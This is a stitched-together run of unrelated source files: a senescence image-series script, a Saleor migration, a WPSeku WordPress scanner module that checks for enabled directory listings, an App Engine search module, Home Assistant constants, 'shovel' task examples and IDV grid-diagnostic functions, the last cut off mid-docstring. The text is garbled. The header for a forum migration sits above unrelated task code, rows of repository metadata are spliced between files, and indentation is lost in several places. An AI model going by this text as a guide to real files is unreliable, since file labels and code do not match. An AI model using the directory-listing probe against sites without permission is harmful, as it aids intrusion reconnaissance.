make_dated_folder(ip, currentScene, folderName)
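# For reference, the strftime pattern used above produces a suffix such as
# `_05-Mar-2020_14.30.59` (the month abbreviation depends on the locale).
# A quick standalone check with a hypothetical fixed timestamp:

```python
from datetime import datetime

# Hypothetical fixed timestamp, just to show the suffix format.
stamp = datetime(2020, 3, 5, 14, 30, 59).strftime('_%d-%b-%Y_%H.%M.%S')
print(stamp)  # e.g. _05-Mar-2020_14.30.59
```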

# File: scripts/generate_image_series.py (from JIC-Image-Analysis/senescence-in-field)
# Draw image time series for one or more plots
from jicbioimage.core.image import Image
import dtoolcore
import click
from translate_labels import rack_plot_to_image_plot
from image_utils import join_horizontally, join_vertically
def identifiers_where_match_is_true(dataset, match_function):
return [i for i in dataset.identifiers if match_function(i)]
def generate_image_series_for_plot(rack, plot):
n_image, n_plot = rack_plot_to_image_plot(rack, plot)
# n_image, n_plot = 55, 24
print "{}_{}".format(n_image, n_plot)
dataset_uri = 'file:/Users/hartleym/data_intermediate/separate_plots'
dataset = dtoolcore.DataSet.from_uri(dataset_uri)
plot_number_overlay = dataset.get_overlay('plot_number')
ordering_overlay = dataset.get_overlay('ordering')
date_overlay = dataset.get_overlay('date')
def is_match(i):
try:
ordering_as_int = int(ordering_overlay[i])
except TypeError:
return False
if ordering_as_int != n_image:
return False
if int(plot_number_overlay[i]) != n_plot:
return False
return True
identifiers = identifiers_where_match_is_true(dataset, is_match)
def sort_identifiers_by_date(identifiers):
dates_and_identifiers = [(date_overlay[i], i) for i in identifiers]
sorted_dates_and_identifiers = sorted(dates_and_identifiers)
_, sorted_identifiers = zip(*sorted_dates_and_identifiers)
        return sorted_identifiers
sorted_identifiers = sort_identifiers_by_date(identifiers)
def identifiers_to_joined_image(identifiers):
images = []
for identifier in identifiers:
image_fpath = dataset.item_content_abspath(identifier)
image = Image.from_file(image_fpath)
images.append(image)
return join_horizontally(images)
result = identifiers_to_joined_image(sorted_identifiers)
output_fname = 'example_from_tobin.png'
with open(output_fname, 'wb') as fh:
fh.write(result.png())
@click.command()
def main():
# Early leaf senescence
# generate_image_series_for_plot(3, 16)
# generate_image_series_for_plot(7, 9)
# generate_image_series_for_plot(9, 1)
# Late leaf senescence
generate_image_series_for_plot(7, 15)
if __name__ == '__main__':
main()

# File: saleor/order/migrations/0015_auto_20170206_0407.py
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-02-06 10:07
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django_prices.models
class Migration(migrations.Migration):
dependencies = [
('order', '0014_auto_20161028_0955'),
]
operations = [
migrations.AlterModelOptions(
name='deliverygroup',
options={'verbose_name': 'Delivery Group', 'verbose_name_plural': 'Delivery Groups'},
),
migrations.AlterModelOptions(
name='order',
options={'ordering': ('-last_status_change',), 'verbose_name': 'Order', 'verbose_name_plural': 'Orders'},
),
migrations.AlterModelOptions(
name='ordereditem',
options={'verbose_name': 'Ordered item', 'verbose_name_plural': 'Ordered items'},
),
migrations.AlterModelOptions(
name='orderhistoryentry',
options={'ordering': ('date',), 'verbose_name': 'Order history entry', 'verbose_name_plural': 'Order history entries'},
),
migrations.AlterModelOptions(
name='ordernote',
options={'verbose_name': 'Order note', 'verbose_name_plural': 'Order notes'},
),
migrations.AlterModelOptions(
name='payment',
options={'ordering': ('-pk',), 'verbose_name': 'Payment', 'verbose_name_plural': 'Payments'},
),
migrations.AlterField(
model_name='deliverygroup',
name='last_updated',
field=models.DateTimeField(auto_now=True, null=True, verbose_name='last updated'),
),
migrations.AlterField(
model_name='deliverygroup',
name='shipping_method_name',
field=models.CharField(blank=True, default=None, editable=False, max_length=255, null=True, verbose_name='shipping method name'),
),
migrations.AlterField(
model_name='deliverygroup',
name='tracking_number',
field=models.CharField(blank=True, default='', max_length=255, verbose_name='tracking number'),
),
migrations.AlterField(
model_name='order',
name='billing_address',
field=models.ForeignKey(editable=False, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='account.Address', verbose_name='billing address'),
),
migrations.AlterField(
model_name='order',
name='discount_amount',
field=django_prices.models.MoneyField(blank=True, currency=settings.DEFAULT_CURRENCY, decimal_places=2, max_digits=12, null=True, verbose_name='discount amount'),
),
migrations.AlterField(
model_name='order',
name='discount_name',
field=models.CharField(blank=True, default='', max_length=255, verbose_name='discount name'),
),
migrations.AlterField(
model_name='order',
name='shipping_address',
field=models.ForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='account.Address', verbose_name='shipping address'),
),
migrations.AlterField(
model_name='order',
name='total_net',
field=django_prices.models.MoneyField(blank=True, currency=settings.DEFAULT_CURRENCY, decimal_places=2, max_digits=12, null=True, verbose_name='total net'),
),
migrations.AlterField(
model_name='order',
name='total_tax',
field=django_prices.models.MoneyField(blank=True, currency=settings.DEFAULT_CURRENCY, decimal_places=2, max_digits=12, null=True, verbose_name='total tax'),
),
migrations.AlterField(
model_name='order',
name='tracking_client_id',
field=models.CharField(blank=True, editable=False, max_length=36, verbose_name='tracking client id'),
),
migrations.AlterField(
model_name='order',
name='user_email',
field=models.EmailField(blank=True, default='', editable=False, max_length=254, verbose_name='user email'),
),
migrations.AlterField(
model_name='order',
name='voucher',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='discount.Voucher', verbose_name='voucher'),
),
migrations.AlterField(
model_name='ordereditem',
name='delivery_group',
field=models.ForeignKey(editable=False, on_delete=django.db.models.deletion.CASCADE, related_name='items', to='order.DeliveryGroup', verbose_name='delivery group'),
),
migrations.AlterField(
model_name='ordereditem',
name='stock',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='product.Stock', verbose_name='stock'),
),
migrations.AlterField(
model_name='orderhistoryentry',
name='comment',
field=models.CharField(blank=True, default='', max_length=100, verbose_name='comment'),
),
migrations.AlterField(
model_name='orderhistoryentry',
name='order',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='history', to='order.Order', verbose_name='order'),
),
migrations.AlterField(
model_name='orderhistoryentry',
name='user',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='user'),
),
migrations.AlterField(
model_name='payment',
name='order',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='payments', to='order.Order', verbose_name='order'),
),
]

# File: modules/WPSeku/modules/discovery/generic/wplisting.py (from Farz7/Darkness)
#!/usr/bin/env python
# -*- Coding: UTF-8 -*-
#
# WPSeku: Wordpress Security Scanner
#
# @url: https://github.com/m4ll0k/WPSeku
# @author: Momo Outaadi (M4ll0k)
import re
from lib import wphttp
from lib import wpprint
class wplisting:
chk = wphttp.UCheck()
out = wpprint.wpprint()
def __init__(self,agent,proxy,redir,time,url,cookie):
self.url = url
self.cookie = cookie
self.req = wphttp.wphttp(
agent=agent,proxy=proxy,
redir=redir,time=time
)
def run(self):
paths = ['/wp-admin','/wp-includes','/wp-content/uploads',
'/wp-content/plugins','/wp-content/themes'
]
try:
for path in paths:
url = wplisting.chk.path(self.url,path)
resp = self.req.send(url,c=self.cookie)
if resp.status_code == 200 and resp._content != None:
if resp.url == url:
wplisting.out.plus('Dir {} listing enabled under: {}'.format(path,resp.url))
except Exception,e:
			pass

# File: webapp/search.py (from henchan/memfinity)
"""High-level search API.
This module implements application-specific search semantics on top of
App Engine's search API. There are two chief operations: querying for
entities, and managing entities in the search facility.
Add and remove Card entities in the search facility:
insert_cards([models.Card])
delete_cards([models.Card])
Query for Card entities:
query_cards(query_string, limit=20) -> search.SearchResults
The results items will have the following fields:
user_key, user_nickname, front, back, info, tag (repeated), added,
modified, source_url
The query_string is free-form, as a user would enter it, and passes
through a custom query processor before the query is submitted to App
Engine. Notably, pass @username to restrict the query to entities
authored by username, and #tag to restrict the query to only documents
matching the given tag. Multiple @usernames or #tags result in an OR
query.
"""
import re
from google.appengine.api import search
from google.appengine.ext import ndb
QUERY_LIMIT = 20
CARD_INDEX_NAME = 'cards'
# Increase this value when _card2doc changes its format so that
# queries can determine the data available on returned documents.
CARD_DOCUMENT_VERSION = '1'
# Ensure we're under the 2000 character limit from
# https://developers.google.com/appengine/docs/python/search/query_strings
MAX_QUERY_LEN = 200
# TODO(chris): it would be better if this module didn't know about
# specific entity types, but instead defined a protocol to get
# metadata from an entity and generate a document.
def insert_cards(cards):
"""Insert or update models.Card entities in the search facility."""
# TODO(chris): should we allow more than 200 cards per call?
assert len(cards) <= 200, len(cards)
card_docs = map(_card2doc, cards)
index = search.Index(name=CARD_INDEX_NAME)
index.put(card_docs)
def delete_cards(cards):
"""Delete models.Card entities from the search facility."""
index = search.Index(name=CARD_INDEX_NAME)
card_doc_ids = map(_card2docid, cards)
index.delete(card_doc_ids)
def query_cards(query_str, limit=QUERY_LIMIT, web_safe_cursor=None,
ids_only=False, user_key=None):
"""Return the search.SearchResults for a query.
ids_only is useful because the returned document IDs are url-safe
keys for models.Card entities.
"""
if web_safe_cursor:
cursor = search.Cursor(web_safe_string=web_safe_cursor)
else:
cursor = None
index = search.Index(name=CARD_INDEX_NAME)
query_processor = _QueryProcessor(
query_str,
name_field='user_nickname',
tag_field='tag',
private_field='private',
user_key_field='user_key',
query_options=search.QueryOptions(limit=limit, cursor=cursor,
ids_only=ids_only),
user_key=user_key)
search_results = index.search(query_processor.query())
# TODO(chris): should this return partially-instantiated
# models.Card instances instead of leaking implementation details
# like we do now?
return search_results
def _card2doc(card):
# TODO(chris): should we include all fields that would be needed
# for rendering a search results item to avoid entity lookup?
tag_fields = [search.AtomField(name='tag', value=tag) for tag in card.tags]
doc = search.Document(
doc_id=_card2docid(card),
fields=[
search.AtomField(name='doc_version', value=CARD_DOCUMENT_VERSION),
search.AtomField(name='user_key', value=card.user_key.urlsafe()),
# TODO(chris): is user_nickname always a direct-match
# shortname, e.g., @chris?
search.AtomField(name='user_nickname', value=card.user_nickname),
# TODO(chris): support HtmlField for richer cards?
search.TextField(name='front', value=card.front),
search.TextField(name='back', value=card.back),
search.TextField(name='info', value=card.info),
search.DateField(name='added', value=card.added),
search.DateField(name='modified', value=card.modified),
search.AtomField(name='source_url', value=card.source_url),
search.AtomField(name='private', value="1" if card.private else "0"),
] + tag_fields)
return doc
def _card2docid(card):
# We set the search.Document's ID to the entity key it mirrors.
return card.key.urlsafe()
def _sanitize_user_input(query_str):
# The search API puts special meaning on certain inputs and we
# don't want to expose the internal query language to users so
# we strictly restrict inputs. The rules are:
#
# Allowed characters for values are [a-zA-Z0-9._-].
# @name is removed and 'name' values returned as a list.
# #tag is removed and 'tag' values returned as a list.
terms, names, tags = [], [], []
for token in query_str.split():
# TODO(chris): allow international characters.
sane_token = re.sub(r'[^a-zA-Z0-9._-]+', '', token)
if sane_token:
            if sane_token in ('AND', 'OR'):
continue # ignore special search keywords
elif token.startswith('@'):
names.append(sane_token)
elif token.startswith('#'):
tags.append(sane_token)
else:
terms.append(sane_token)
return terms, names, tags
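# As a standalone illustration of the rules above (a hedged re-implementation
# for demonstration only, not this module's entry point), the tokenizer keeps
# [a-zA-Z0-9._-], routes @name and #tag tokens to their own lists, and drops
# bare search keywords:

```python
import re

def sanitize(query_str):
    # Mirrors the documented rules: strip disallowed characters,
    # @name -> names, #tag -> tags, everything else -> terms.
    terms, names, tags = [], [], []
    for token in query_str.split():
        sane = re.sub(r'[^a-zA-Z0-9._-]+', '', token)
        if not sane or sane in ('AND', 'OR'):
            continue
        if token.startswith('@'):
            names.append(sane)
        elif token.startswith('#'):
            tags.append(sane)
        else:
            terms.append(sane)
    return terms, names, tags

print(sanitize('hola adios! @chris #vocab AND'))
# -> (['hola', 'adios'], ['chris'], ['vocab'])
```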
class _QueryProcessor(object):
"""Simple queries, possibly with @name and #tag tokens.
name_field is the field @name tokens should apply to.
tag_field is the name of the field #tag tokens should apply to.
"""
def __init__(self, query_str,
name_field, tag_field, private_field, user_key_field,
query_options=None, user_key=None):
self.query_str = query_str
self.name_field = name_field
self.tag_field = tag_field
self.private_field = private_field
self.user_key_field = user_key_field
self.query_options = query_options
self.user_key = user_key
def _sanitize_user_input(self):
query_str = self.query_str[:MAX_QUERY_LEN]
return _sanitize_user_input(query_str)
def _build_query_string(self):
terms, names, tags = self._sanitize_user_input()
# Our simply query logic is to OR together all terms from the
# user, then AND in the name or tag filters (plus a privacy clause).
parts = []
if terms:
parts.append(' OR '.join(terms))
if names:
parts.append('%s: (%s)' % (self.name_field, ' OR '.join(names)))
if tags:
parts.append('%s: (%s)' % (self.tag_field, ' OR '.join(tags)))
# Don't return cards that other users have marked private...
privacy = '%s: 0' % self.private_field
if self.user_key:
# ... but always show the user their own cards in results.
privacy += ' OR %s: (%s)' % (self.user_key_field, self.user_key)
parts.append('(' + privacy + ')')
return ' AND '.join(parts)
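# The assembly step can likewise be sketched standalone (a simplified mirror
# of the method above, with this module's default field names hard-coded):

```python
def build_query_string(terms, names, tags, user_key=None):
    # OR together free-form terms, then AND in name/tag filters
    # plus the privacy clause, as described above.
    parts = []
    if terms:
        parts.append(' OR '.join(terms))
    if names:
        parts.append('user_nickname: (%s)' % ' OR '.join(names))
    if tags:
        parts.append('tag: (%s)' % ' OR '.join(tags))
    privacy = 'private: 0'
    if user_key:
        privacy += ' OR user_key: (%s)' % user_key
    parts.append('(' + privacy + ')')
    return ' AND '.join(parts)

print(build_query_string(['hola', 'adios'], ['chris'], []))
# -> hola OR adios AND user_nickname: (chris) AND (private: 0)
```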
def query(self):
query = search.Query(
query_string=self._build_query_string(),
options=self.query_options)
return query

# File: custom_components/vaddio_conferenceshot/const.py (from rohankapoorcom/vaddio_conferenceshot)
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.const import CONF_HOST, CONF_PASSWORD, CONF_PATH, CONF_USERNAME
DOMAIN = "vaddio_conferenceshot"
DATA_SCHEMA = vol.Schema(
{
vol.Required(CONF_HOST): cv.string,
vol.Required(CONF_USERNAME): cv.string,
vol.Required(CONF_PASSWORD): cv.string,
}
)
SERVICE_RECALL_PRESET = "move_to_preset"
ATTR_PRESET_ID = "preset"

# File: forum/migrations/0001_initial.py (from Aerodlyn/mu)
# Generated by Django 3.1.7 on 2021-03-26 01:27
@task
def hello(name='Foo'):
    '''Prints "Hello, " followed by the provided name.

    Examples:
        shovel bar.hello
        shovel bar.hello --name=Erin
        http://localhost:3000/bar.hello?Erin'''
    print('Hello, %s' % name)

@task
def args(*args):
    '''Echoes back all the args you give it.

    This exists mostly to demonstrate the fact that shovel
    is compatible with variable argument functions.

    Examples:
        shovel bar.args 1 2 3 4
        http://localhost:3000/bar.args?1&2&3&4'''
    for arg in args:
        print('You said "%s"' % arg)

@task
def kwargs(**kwargs):
    '''Echoes back all the kwargs you give it.

    This exists mostly to demonstrate that shovel is
    compatible with keyword argument functions.

    Examples:
        shovel bar.kwargs --foo=5 --bar 5 --howdy hey
        http://localhost:3000/bar.kwargs?foo=5&bar=5&howdy=hey'''
    for key, val in kwargs.items():
        print('You said "%s" => "%s"' % (key, val)) | 27.621622 | 65 | 0.614481 | 148 | 1,022 | 4.243243 | 0.385135 | 0.057325 | 0.08121 | 0.095541 | 0.417197 | 0.235669 | 0.200637 | 0.200637 | 0 | 0 | 0 | 0.031788 | 0.261252 | 1,022 | 37 | 66 | 27.621622 | 0.8 | 0.619374 | 0 | 0.25 | 0 | 0 | 0.154362 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.083333 | 0 | 0.333333 | 0.25 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d5eefeb4c414f13bc2793346ebb57b29f5de79db | 572 | py | Python | forum/migrations/0001_initial.py | Aerodlyn/mu | 2c3b95e5a83d0f651dd8ad287b471803e1fec3a1 | [
"MIT"
] | 1 | 2021-06-25T22:27:39.000Z | 2021-06-25T22:27:39.000Z | forum/migrations/0001_initial.py | Aerodlyn/mu | 2c3b95e5a83d0f651dd8ad287b471803e1fec3a1 | [
"MIT"
] | 1 | 2022-03-12T00:55:31.000Z | 2022-03-12T00:55:31.000Z | forum/migrations/0001_initial.py | Aerodlyn/mu | 2c3b95e5a83d0f651dd8ad287b471803e1fec3a1 | [
"MIT"
] | null | null | null | # Generated by Django 3.1.7 on 2021-03-26 01:27
from django.db import migrations, models
class Migration(migrations.Migration):
    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Community',
            fields=[
                ('name', models.CharField(max_length=64, primary_key=True, serialize=False)),
                ('description', models.TextField()),
                ('private', models.BooleanField(default=False)),
                ('slug', models.SlugField()),
            ],
        ),
    ]
| 23.833333 | 93 | 0.552448 | 53 | 572 | 5.924528 | 0.792453 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.043702 | 0.31993 | 572 | 23 | 94 | 24.869565 | 0.763496 | 0.078671 | 0 | 0 | 1 | 0 | 0.066667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.0625 | 0 | 0.3125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d5eff585130a0defb51fd844556d3dea1143c55d | 18,862 | py | Python | src/ucar/unidata/idv/resources/python/griddiag.py | JessicaWiedemeier/IDV | e5f67c755cc95f8ad2123bdc45a91f0e5eca0d64 | [
"CNRI-Jython"
] | 1 | 2021-06-09T11:24:48.000Z | 2021-06-09T11:24:48.000Z | src/ucar/unidata/idv/resources/python/griddiag.py | JessicaWiedemeier/IDV | e5f67c755cc95f8ad2123bdc45a91f0e5eca0d64 | [
"CNRI-Jython"
] | null | null | null | src/ucar/unidata/idv/resources/python/griddiag.py | JessicaWiedemeier/IDV | e5f67c755cc95f8ad2123bdc45a91f0e5eca0d64 | [
"CNRI-Jython"
] | null | null | null | """
This is the doc for the Grid Diagnostics module. These functions
are based on the grid diagnostics from the GEneral Meteorological
PAcKage (GEMPAK). Note that the names are case sensitive and some
are named slightly different from GEMPAK functions to avoid conflicts
with Jython built-ins (e.g. str).
<P>
In the following operators, scalar operands are named S<sub>n</sub> and
vector operands are named V<sub>n</sub>. Lowercase u and v refer to the
grid relative components of a vector.
"""
def GRAVITY():
    """ Gravity constant """
    return DerivedGridFactory.GRAVITY;

# Math functions
def atn2(S1,S2,WA=0):
    """ Wrapper for atan2 built-in
    <div class=jython>
    ATN2 (S1, S2) = ATAN ( S1 / S2 )<br>
    WA = use WEIGHTED_AVERAGE (default NEAREST_NEIGHBOR)
    </div>
    """
    return GridMath.atan2(S1,S2,WA)

def add(S1,S2,WA=0):
    """ Addition
    <div class=jython>
    ADD (S1, S2) = S1 + S2<br>
    WA = use WEIGHTED_AVERAGE (default NEAREST_NEIGHBOR)
    </div>
    """
    return GridMath.add(S1,S2,WA)

def mul(S1,S2,WA=0):
    """ Multiply
    <div class=jython>
    MUL (S1, S2) = S1 * S2<br>
    WA = use WEIGHTED_AVERAGE (default NEAREST_NEIGHBOR)
    </div>
    """
    return GridMath.multiply(S1,S2,WA)

def quo(S1,S2,WA=0):
    """ Divide
    <div class=jython>
    QUO (S1, S2) = S1 / S2<br>
    WA = use WEIGHTED_AVERAGE (default NEAREST_NEIGHBOR)
    </div>
    """
    return GridMath.divide(S1,S2,WA)

def sub(S1,S2,WA=0):
    """ Subtract
    <div class=jython>
    SUB (S1, S2) = S1 - S2<br>
    WA = use WEIGHTED_AVERAGE (default NEAREST_NEIGHBOR)
    </div>
    """
    return GridMath.subtract(S1,S2,WA)
# Scalar quantities
def adv(S,V):
    """ Horizontal Advection, negative by convention
    <div class=jython>
    ADV ( S, V ) = - ( u * DDX (S) + v * DDY (S) )
    </div>
    """
    return -add(mul(ur(V),ddx(S)),mul(vr(V),ddy(S)))

def avg(S1,S2):
    """ Average of 2 scalars
    <div class=jython>
    AVG (S1, S2) = ( S1 + S2 ) / 2
    </div>
    """
    return add(S1,S2)/2

def avor(V):
    """ Absolute Vorticity
    <div class=jython>
    AVOR ( V ) = VOR ( V ) + CORL(V)
    </div>
    """
    relv = vor(V)
    return add(relv,corl(relv))

def circs(S, D=2):
    """
    <div class=jython>
    Apply a circular aperture smoothing to the grid points.  The weighting
    function is the circular aperture diffraction function.  D is
    the radius of influence in grid increments, increasing D increases
    the smoothing. (default D=2)
    </div>
    """
    return GridUtil.smooth(S, "CIRC", int(D))

def corl(S):
    """ Coriolis Parameter for all points in a grid
    <div class=jython>
    CORL = TWO_OMEGA*sin(latr)
    </div>
    """
    return DerivedGridFactory.createCoriolisGrid(S)

def cress(S, D=2):
    """
    <div class=jython>
    Apply a Cressman smoothing to the grid points.  The smoothed value
    is given by a weighted average of surrounding grid points.  D is
    the radius of influence in grid increments,
    increasing D increases the smoothing. (default D=2)
    </div>
    """
    return GridUtil.smooth(S, "CRES", int(D))

def cros(V1,V2):
    """ Vector cross product magnitude
    <div class=jython>
    CROS ( V1, V2 ) = u1 * v2 - u2 * v1
    </div>
    """
    return sub(mul(ur(V1),vr(V2)),mul(ur(V2),vr(V1)))
def ddx(S):
    """ Take the derivative with respect to the domain's X coordinate
    """
    return GridMath.ddx(S);

def ddy(S):
    """ Take the derivative with respect to the domain's Y coordinate
    """
    return GridMath.ddy(S);

def defr(V):
    """ Total deformation
    <div class=jython>
    DEF ( V ) = ( STRD (V) ** 2 + SHR (V) ** 2 ) ** .5
    </div>
    """
    return mag(strd(V),shr(V))

def div(V):
    """ Horizontal Divergence
    <div class=jython>
    DIV ( V ) = DDX ( u ) + DDY ( v )
    </div>
    """
    return add(ddx(ur(V)),ddy(vr(V)))

def dirn(V):
    """ North relative direction of a vector
    <div class=jython>
    DIRN ( V ) = DIRR ( un(v), vn(v) )
    </div>
    """
    return dirr(DerivedGridFactory.createTrueFlowVector(V))

def dirr(V):
    """ Grid relative direction of a vector
    """
    return DerivedGridFactory.createVectorDirection(V)

def dot(V1,V2):
    """ Vector dot product
    <div class=jython>
    DOT ( V1, V2 ) = u1 * u2 + v1 * v2
    </div>
    """
    product = mul(V1,V2)
    return add(ur(product),vr(product))

def gwfs(S, N=6):
    """
    <div class=jython>
    Horizontal smoothing using normally distributed weights
    with theoretical response of 1/e for N * delta-x wave.
    Increasing N increases the smoothing. (default N=6)
    </div>
    """
    return GridUtil.smooth(S, "GWFS", int(N))

def jcbn(S1,S2):
    """ Jacobian Determinant
    <div class=jython>
    JCBN ( S1, S2 ) = DDX (S1) * DDY (S2) - DDY (S1) * DDX (S2)
    </div>
    """
    return sub(mul(ddx(S1),ddy(S2)),mul(ddy(S1),ddx(S2)))

def latr(S):
    """ Latitude of all points in a grid
    """
    return DerivedGridFactory.createLatitudeGrid(S)
def lap(S):
    """ Laplacian operator
    <div class=jython>
    LAP ( S ) = DIV ( GRAD (S) )
    </div>
    """
    grads = grad(S)
    return div(grads)

def lav(S,level1=None,level2=None, unit=None):
    """ Layer Average of a multi layer grid
    <div class=jython>
    LAV ( S ) = ( S (level1) + S (level2) ) / 2.
    </div>
    """
    if level1 == None:
        return GridMath.applyFunctionOverLevels(S, GridMath.FUNC_AVERAGE)
    else:
        return layerAverage(S,level1,level2, unit)

def ldf(S,level1,level2, unit=None):
    """ Layer Difference
    <div class=jython>
    LDF ( S ) = S (level1) - S (level2)
    </div>
    """
    return layerDiff(S,level1,level2, unit);

def mag(*a):
    """ Magnitude of a vector
    """
    if (len(a) == 1):
        return DerivedGridFactory.createVectorMagnitude(a[0]);
    else:
        return DerivedGridFactory.createVectorMagnitude(a[0],a[1]);

def mixr(temp,rh):
    """ Mixing Ratio from Temperature, RH (requires pressure domain)
    """
    return DerivedGridFactory.createMixingRatio(temp,rh)

def relh(temp,mixr):
    """ Create Relative Humidity from Temperature, mixing ratio (requires pressure domain)
    """
    return DerivedGridFactory.createRelativeHumidity(temp,mixr)

def pvor(S,V):
    """ Potential Vorticity (usually from theta and wind)
    """
    return DerivedGridFactory.createPotentialVorticity(S,V)

def rects(S, D=2):
    """
    <div class=jython>
    Apply a rectangular aperture smoothing to the grid points.  The weighting
    function is the product of the rectangular aperture diffraction function
    in the x and y directions.  D is the radius of influence in grid
    increments, increasing D increases the smoothing. (default D=2)
    </div>
    """
    return GridUtil.smooth(S, "RECT", int(D))
def savg(S):
    """ Average over whole grid
    <div class=jython>
    SAVG ( S ) = average of all non-missing grid point values
    </div>
    """
    return GridMath.applyFunctionToLevels(S, GridMath.FUNC_AVERAGE)

def savs(S):
    """ Average over grid subset
    <div class=jython>
    SAVS ( S ) = average of all non-missing grid point values in the subset
    area
    </div>
    """
    return savg(S)

def sdiv(S,V):
    """ Horizontal Flux Divergence
    <div class=jython>
    SDIV ( S, V ) = S * DIV ( V ) + DOT ( V, GRAD ( S ) )
    </div>
    """
    return add(mul(S,(div(V))) , dot(V,grad(S)))

def shr(V):
    """ Shear Deformation
    <div class=jython>
    SHR ( V ) = DDX ( v ) + DDY ( u )
    </div>
    """
    return add(ddx(vr(V)),ddy(ur(V)))

def sm5s(S):
    """ Smooth a scalar grid using a 5-point smoother
    <div class=jython>
    SM5S ( S ) = .5 * S (i,j) + .125 * ( S (i+1,j) + S (i,j+1) +
                                         S (i-1,j) + S (i,j-1) )
    </div>
    """
    return GridUtil.smooth(S, "SM5S")

def sm9s(S):
    """ Smooth a scalar grid using a 9-point smoother
    <div class=jython>
    SM9S ( S ) = .25 * S (i,j) + .125 * ( S (i+1,j) + S (i,j+1) +
                                          S (i-1,j) + S (i,j-1) )
                               + .0625 * ( S (i+1,j+1) +
                                           S (i+1,j-1) +
                                           S (i-1,j+1) +
                                           S (i-1,j-1) )
    </div>
    """
    return GridUtil.smooth(S, "SM9S")

def strd(V):
    """ Stretching Deformation
    <div class=jython>
    STRD ( V ) = DDX ( u ) - DDY ( v )
    </div>
    """
    return sub(ddx(ur(V)),ddy(vr(V)))
def thta(temp):
    """ Potential Temperature from Temperature (requires pressure domain)
    """
    return DerivedGridFactory.createPotentialTemperature(temp)

def thte(temp,rh):
    """ Equivalent Potential Temperature from Temperature and Relative
    humidity (requires pressure domain)
    """
    return DerivedGridFactory.createEquivalentPotentialTemperature(temp,rh)

def un(V):
    """ North relative u component
    """
    return ur(DerivedGridFactory.createTrueFlowVector(V))

def ur(V):
    """ Grid relative u component
    """
    return DerivedGridFactory.getUComponent(V)

def vn(V):
    """ North relative v component
    """
    return vr(DerivedGridFactory.createTrueFlowVector(V))

def vor(V):
    """ Relative Vorticity
    <div class=jython>
    VOR ( V ) = DDX ( v ) - DDY ( u )
    </div>
    """
    return sub(ddx(vr(V)),ddy(ur(V)))

def vr(V):
    """ Grid relative v component
    """
    return DerivedGridFactory.getVComponent(V)

def xav(S):
    """ Average along a grid row
    <div class=jython>
    XAV (S) = ( S (X1) + S (X2) + ... + S (KXD) ) / KNT
    KXD = number of points in row
    KNT = number of non-missing points in row
    XAV for a row is stored at every point in that row.
    </div>
    """
    return GridMath.applyFunctionToAxis(S, GridMath.FUNC_AVERAGE, GridMath.AXIS_X)

def xsum(S):
    """ Sum along a grid row
    <div class=jython>
    XSUM (S) = ( S (X1) + S (X2) + ... + S (KXD) )
    KXD = number of points in row
    XSUM for a row is stored at every point in that row.
    </div>
    """
    return GridMath.applyFunctionToAxis(S, GridMath.FUNC_SUM, GridMath.AXIS_X)

def yav(S):
    """ Average along a grid column
    <div class=jython>
    YAV (S) = ( S (Y1) + S (Y2) + ... + S (KYD) ) / KNT
    KYD = number of points in column
    KNT = number of non-missing points in column
    </div>
    """
    return GridMath.applyFunctionToAxis(S, GridMath.FUNC_AVERAGE, GridMath.AXIS_Y)

def ysum(S):
    """ Sum along a grid column
    <div class=jython>
    YSUM (S) = ( S (Y1) + S (Y2) + ... + S (KYD) )
    KYD = number of points in column
    YSUM for a column is stored at every point in that column.
    </div>
    """
    return GridMath.applyFunctionToAxis(S, GridMath.FUNC_SUM, GridMath.AXIS_Y)

def zav(S):
    """ Average across the levels of a grid at all points
    <div class=jython>
    ZAV (S) = ( S (Z1) + S (Z2) + ... + S (KZD) ) / KNT
    KZD = number of levels
    KNT = number of non-missing points in column
    </div>
    """
    return GridMath.applyFunctionToLevels(S, GridMath.FUNC_AVERAGE)

def zsum(S):
    """ Sum across the levels of a grid at all points
    <div class=jython>
    ZSUM (S) = ( S (Z1) + S (Z2) + ... + S (KZD) )
    KZD = number of levels
    ZSUM for a vertical column is stored at every point
    </div>
    """
    return GridMath.applyFunctionOverLevels(S, GridMath.FUNC_SUM)
def wshr(V, Z, top, bottom):
    """ Magnitude of the vertical wind shear in a layer
    <div class=jython>
    WSHR ( V ) = MAG [ VLDF (V) ] / LDF (Z)
    </div>
    """
    dv = mag(vldf(V,top,bottom))
    dz = ldf(Z,top,bottom)
    return quo(dv,dz)

# Vector output
def age(obs,geo):
    """ Ageostrophic wind
    <div class=jython>
    AGE ( S ) = [ u (OBS) - u (GEO(S)), v (OBS) - v (GEO(S)) ]
    </div>
    """
    return sub(obs,geo)

def circv(S, D=2):
    """
    <div class=jython>
    Apply a circular aperture smoothing to the grid points.  The weighting
    function is the circular aperture diffraction function.  D is
    the radius of influence in grid increments, increasing D increases
    the smoothing. (default D=2)
    </div>
    """
    return GridUtil.smooth(S, "CIRC", int(D))

def cresv(S, D=2):
    """
    <div class=jython>
